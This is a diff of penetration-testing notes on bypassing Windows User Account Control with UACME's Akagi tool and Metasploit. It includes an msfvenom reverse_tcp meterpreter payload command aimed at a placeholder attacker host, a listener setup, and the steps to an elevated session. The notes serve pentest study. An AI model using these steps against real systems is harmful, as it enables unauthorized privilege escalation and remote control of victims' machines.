francescovolpe/offsecnotes/PT/3 - Privilege Escalation/README.md

 <summary>UAC Bypass</summary>

 - User Account Control (UAC) is a feature that enables a consent prompt for elevated activities.
-- UACME
 - Prerequisites:
   1. User must be a member of the Administrators group.
      - `net localgroup administrators`
   2. Full interactive shell with the victim (a common nc.exe shell is not enough).
      - You can use meterpreter
+- Metasploit
+  - search module bypassuac ...
-  - Procedure
+- UACME
   1. If architecture is x64 it's better to use meterpreter x64 or migrate to process x64 with sessions=1
      - `ps` to show process
      - (ex. `migrate <PID explorer.exe>`)
   3. Upload Akagi (Akagi64.exe if x64)
   3. Create payload with msfvenom
      - `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o backdoor.exe`
   5. Use exploit/multi/handler to start a listener
   6. Akagi64.exe 23 <payload_full_path>
      - **NOTE FULL PATH**
   7. Once run, we will get meterpreter session - getprivs/getsystem to get elevated privs

 </details>